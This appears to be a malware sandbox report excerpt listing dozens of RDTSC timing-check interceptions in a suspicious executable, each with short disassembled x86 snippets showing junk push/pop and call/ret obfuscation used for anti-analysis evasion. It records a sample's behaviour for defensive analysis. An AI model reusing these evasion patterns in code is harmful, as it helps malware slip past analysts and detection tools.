Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10BF199 second address: 10BF1B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 jmp 00007F930851C683h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10B2E97 second address: 10B2EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9308CAD939h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9308CAD932h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 108EAB9 second address: 108EABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 108EABD second address: 108EACD instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9308CAD926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10C4287 second address: 10C42A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C682h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10C42A1 second address: 10C42A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10C42A5 second address: 10C42A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10C65D2 second address: 10C65FE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F9308CAD933h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F9308CAD92Dh 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1087D9C second address: 1087DF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C67Bh 0x00000007 pushad 0x00000008 jmp 00007F930851C682h 0x0000000d jmp 00007F930851C67Ch 0x00000012 jmp 00007F930851C684h 0x00000017 jmp 00007F930851C67Bh 0x0000001c popad 0x0000001d pop edx 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1087DF0 second address: 1087E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9308CAD939h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1087E0D second address: 1087E19 instructions: 0x00000000 rdtsc 0x00000002 js 00007F930851C676h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10CB919 second address: 10CB951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9308CAD939h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9308CAD939h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10CB951 second address: 10CB957 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10CDC70 second address: 10CDC74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10CDDE6 second address: 10CDE1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F930851C676h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F930851C67Bh 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F930851C689h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10CDE1F second address: 10CDE55 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9308CAD928h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F9308CAD938h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F9308CAD92Ah 0x0000001e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10CE197 second address: 10CE19E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10CE19E second address: 10CE1A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10CE1A4 second address: 10CE1A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10CE1A8 second address: 10CE1AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10CE2F3 second address: 10CE2F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10CE2F7 second address: 10CE2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10CE472 second address: 10CE47C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F930851C676h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10CEA6B second address: 10CEA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10CEE95 second address: 10CEEB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C688h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10CEEB1 second address: 10CEEE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9308CAD937h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9308CAD936h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10CF03D second address: 10CF046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10CF046 second address: 10CF04A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10CF04A second address: 10CF04E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10CFF00 second address: 10CFF62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9308CAD930h 0x00000009 popad 0x0000000a pop ebx 0x0000000b mov dword ptr [esp], eax 0x0000000e mov esi, dword ptr [ebp+122D3710h] 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F9308CAD928h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 jo 00007F9308CAD92Ch 0x00000036 sub dword ptr [ebp+122D34A0h], ebx 0x0000003c push 00000000h 0x0000003e sub dword ptr [ebp+122D2C3Eh], eax 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 push edi 0x00000048 jne 00007F9308CAD926h 0x0000004e pop edi 0x0000004f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10CFD99 second address: 10CFDB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F930851C67Eh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10CFDB3 second address: 10CFDB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D06F7 second address: 10D0701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D0701 second address: 10D070C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D1B6D second address: 10D1BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F930851C678h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000014h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ebx 0x00000028 call 00007F930851C678h 0x0000002d pop ebx 0x0000002e mov dword ptr [esp+04h], ebx 0x00000032 add dword ptr [esp+04h], 00000014h 0x0000003a inc ebx 0x0000003b push ebx 0x0000003c ret 0x0000003d pop ebx 0x0000003e ret 0x0000003f jnl 00007F930851C67Ch 0x00000045 sub esi, dword ptr [ebp+122D37E8h] 0x0000004b push 00000000h 0x0000004d or esi, 6BA4DE38h 0x00000053 xchg eax, ebx 0x00000054 push edi 0x00000055 jmp 00007F930851C685h 0x0000005a pop edi 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e jc 00007F930851C678h 0x00000064 pushad 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D070C second address: 10D0710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D2658 second address: 10D26CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C685h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jnl 00007F930851C678h 0x00000011 pop ebx 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F930851C678h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov si, ax 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D3282h], edi 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push eax 0x0000003d call 00007F930851C678h 0x00000042 pop eax 0x00000043 mov dword ptr [esp+04h], eax 0x00000047 add dword ptr [esp+04h], 00000017h 0x0000004f inc eax 0x00000050 push eax 0x00000051 ret 0x00000052 pop eax 0x00000053 ret 0x00000054 xchg eax, ebx 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D26CF second address: 10D26D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D23EC second address: 10D241C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a jmp 00007F930851C686h 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F930851C67Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D51AC second address: 10D51B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D3A3C second address: 10D3A46 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F930851C676h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D5A69 second address: 10D5A89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD936h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D3A46 second address: 10D3A50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F930851C676h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D5A89 second address: 10D5A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10DDE62 second address: 10DDE67 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10DC0C3 second address: 10DC0C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10DC0C9 second address: 10DC0CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E13DE second address: 10E13E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E13E2 second address: 10E13E8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10DEF8E second address: 10DEF92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10DEF92 second address: 10DEF96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E158D second address: 10E1591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E1591 second address: 10E15A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F930851C676h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E15A3 second address: 10E15A9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E3511 second address: 10E3515 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E3515 second address: 10E3594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 mov bx, ax 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F9308CAD928h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 jnc 00007F9308CAD929h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007F9308CAD928h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 0000001Bh 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 mov dword ptr [ebp+122D1B94h], edi 0x0000004f mov ebx, 143D1500h 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007F9308CAD934h 0x0000005e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E3594 second address: 10E359A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E26AA second address: 10E26AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E65E6 second address: 10E65EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E770B second address: 10E7723 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD934h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E85E8 second address: 10E85EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E85EC second address: 10E8653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007F9308CAD92Bh 0x0000000d nop 0x0000000e sub bx, 570Eh 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007F9308CAD928h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f mov ebx, ecx 0x00000031 sub di, 5708h 0x00000036 push 00000000h 0x00000038 mov edi, ebx 0x0000003a xchg eax, esi 0x0000003b jmp 00007F9308CAD92Bh 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F9308CAD92Eh 0x00000049 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E8653 second address: 10E866F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C680h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F930851C67Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E46BC second address: 10E46C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E577D second address: 10E5811 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F930851C676h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d or di, 6AF9h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 and edi, dword ptr [ebp+122D27C9h] 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push eax 0x00000029 call 00007F930851C678h 0x0000002e pop eax 0x0000002f mov dword ptr [esp+04h], eax 0x00000033 add dword ptr [esp+04h], 00000019h 0x0000003b inc eax 0x0000003c push eax 0x0000003d ret 0x0000003e pop eax 0x0000003f ret 0x00000040 mov eax, dword ptr [ebp+122D164Dh] 0x00000046 mov dword ptr [ebp+122D3045h], ebx 0x0000004c push FFFFFFFFh 0x0000004e call 00007F930851C67Ch 0x00000053 mov ebx, dword ptr [ebp+122D360Ch] 0x00000059 pop ebx 0x0000005a nop 0x0000005b jbe 00007F930851C685h 0x00000061 jmp 00007F930851C67Fh 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 jmp 00007F930851C683h 0x0000006e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E46C3 second address: 10E46C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E5811 second address: 10E5817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E3718 second address: 10E37B2 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9308CAD92Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, ebx 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F9308CAD928h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e mov dword ptr [ebp+12485167h], ecx 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b jmp 00007F9308CAD931h 0x00000040 mov eax, dword ptr [ebp+122D02F1h] 0x00000046 add bx, 1061h 0x0000004b xor dword ptr [ebp+122D3271h], esi 0x00000051 push FFFFFFFFh 0x00000053 stc 0x00000054 sbb edi, 1E135499h 0x0000005a nop 0x0000005b jbe 00007F9308CAD93Eh 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push ecx 0x00000065 jno 00007F9308CAD926h 0x0000006b pop ecx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E8817 second address: 10E8829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F930851C67Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E8829 second address: 10E882D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10EA596 second address: 10EA5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007F930851C676h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10EA5A2 second address: 10EA5A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10EA5A6 second address: 10EA627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a and di, 2D12h 0x0000000f and ebx, dword ptr [ebp+122D34ADh] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F930851C678h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 mov di, si 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007F930851C678h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 00000017h 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 mov di, A54Dh 0x00000054 mov ebx, dword ptr [ebp+124532CCh] 0x0000005a xchg eax, esi 0x0000005b jl 00007F930851C684h 0x00000061 jmp 00007F930851C67Eh 0x00000066 push eax 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10E971A second address: 10E971E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10EA627 second address: 10EA62B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10EA62B second address: 10EA635 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9308CAD926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10EA635 second address: 10EA63F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F930851C676h 0x0000000a rdtsc
